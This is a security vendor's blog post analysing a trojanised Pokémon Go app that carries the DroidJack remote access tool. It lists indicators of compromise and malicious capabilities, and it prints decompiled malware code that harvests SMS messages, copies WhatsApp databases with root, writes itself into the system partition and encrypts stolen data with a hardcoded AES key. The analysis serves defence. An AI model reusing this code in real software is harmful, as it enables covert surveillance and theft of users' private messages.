September 2, 2016

Pokémon Go bundles with Malicious Remote Administration Tool DroidJack

Pokémon Go bundles with Malicious Remote Administration Tool DroidJack

Due to the expanding popularity of Pokémon Go, the app has attracted more hacker’s attention than ever, because the popular game app can help hackers spread their malicious apps more efficiently. An app was recently discovered by Trustlook that is a Pokémon Go app repackaged with the RAT (Remote Administration Tool) tool DroidJack. The app appears to be a normal game, but actually can be used to control the user’s device. The research Trojan package can be identified as having the following characteristics:

  • MD5: d350cc8222792097317608ea95b283a8
  • SHA256: 15db22fd7d961f4d4bd96052024d353b3ff4bd135835d2644d94d74c925af3c4
  • Size: 184036 bytes
  • App name: 61029052
  • Package name: com.nianticlabs.pokemongo

The app is identical to the normal Pokémon Go app when it is running:

image02
image01
image04
image03

The app is signed with the following certificate, which does not belong to the Pokemon Go game developer:

image06

From the follow code structure images, the package “net.droidjack.server” can be found:

image05

The DroidJack RAT tool can perform the following malicious activities:

  • Get SMS Messages
  • Monitor/record calls
  • Get call logs
  • Browser bookmarks/history
  • WhatsApp Call Logs
  • GPS location
  • WhatsApp Chat
  • Record sound
  • Capture video
  • Take picture
  • Send device information
  • Install file to system folder
  • Update itself

The following code snippets are responsible for collecting SMS messages:


 {

   ag localag = new ag(this.c);

   localag.b();

   Object localObject = Uri.parse(“content://sms/sent”);

   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);

   if (localCursor.getCount() > 0) {}

   for (;;)

   {

     if (!localCursor.moveToNext()) {

       return;

     }

     String str3 = localCursor.getString(localCursor.getColumnIndex(“body”));

     String str1 = localCursor.getString(localCursor.getColumnIndex(“address”));

     String str4 = localCursor.getString(localCursor.getColumnIndex(“date”));

     String str2 = a(str1);

     localObject = str2;

[…]  

 protected void b()

 {

   ag localag = new ag(this.c);

   localag.a();

   Object localObject = Uri.parse(“content://sms/inbox”);

   Cursor localCursor = this.c.getContentResolver().query((Uri)localObject, null, null, null, null);

   if (localCursor.getCount() > 0) {}

   for (;;)

   {

     if (!localCursor.moveToNext()) {

       return;

     }

     String str3 = localCursor.getString(localCursor.getColumnIndex(“body”));

     String str1 = localCursor.getString(localCursor.getColumnIndex(“address”));

     String str2 = a(str1);

     localObject = str2;

     if (str2 == null) {

       localObject = str1;

     }

     localag.a(str1, (String)localObject, str3, localCursor.getString(localCursor.getColumnIndex(“date”)));

   }

 }

The following code snippets are used to retrieve WhatsApp logs:

protected byte[] a()

 {

   try

   {

     this.d = new File(Environment.getExternalStorageDirectory() + “/WhatsApp/Databases/wams.db”);

     Object localObject = new DataOutputStream(Runtime.getRuntime().exec(“su”).getOutputStream());

     ((DataOutputStream)localObject).writeBytes(“cp data/data/com.whatsapp/databases/msgstore.db ” + this.d.getAbsolutePath());

     ((DataOutputStream)localObject).writeBytes(“nexit”);

     Thread.sleep(10000L);

     if (this.d.exists()) {}

     return “NoWA”.getBytes();

   }

The following code snippets are used to install files to the system folder:

public class FBDBSender

protected byte[] c()

 {

   try

   {

     Object localObject = new File(this.a.getPackageManager().getApplicationInfo(this.a.getPackageName(), 128).sourceDir);

     DataOutputStream localDataOutputStream = new DataOutputStream(Runtime.getRuntime().exec(“su”).getOutputStream());

     localDataOutputStream.writeBytes(“mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /systemn”);

     localDataOutputStream.writeBytes(“cp -rp ” + ((File)localObject).getAbsolutePath() + ” /system/app/” + ((File)localObject).getName());

     localDataOutputStream.writeBytes(“nmount -o remount,ro -t yaffs2 /dev/block/mtdblock3 /system”);

     localDataOutputStream.writeBytes(“nexit”);

     Thread.sleep(10000L);

     localObject = “Ack”.getBytes();

     return localObject;

   }

The malware may encrypt the collected data using AES before sending it out:

public class aj

{

 private static final byte[] a = { 76, 82, 83, 65, 78, 74, 85, 73, 83, 84, 72, 69, 82, 65, 74, 65 };

 

 public static String a(String paramString)

 {

   Key localKey = a();

   Cipher localCipher = Cipher.getInstance(“AES”);

   localCipher.init(1, localKey);

   return Base64.encodeToString(localCipher.doFinal(paramString.getBytes()), 0);

 }

 

 private static Key a()

 {

   return new SecretKeySpec(a, “AES”);

 }

 

 public static String b(String paramString)

 {

   Key localKey = a();

   Cipher localCipher = Cipher.getInstance(“AES”);

   localCipher.init(2, localKey);

   return new String(localCipher.doFinal(Base64.decode(paramString, 0)));

 }

}

Summary

Installing apps from third-party sources may expose your device to potential threats. Downloading from a trusted source is a way to keep devices secure. Installing a security app such as Trustlook Mobile Security & Antivirus also help to prevent identity theft and safeguard you online.

Author
Wilson Ye

Read more posts by this author.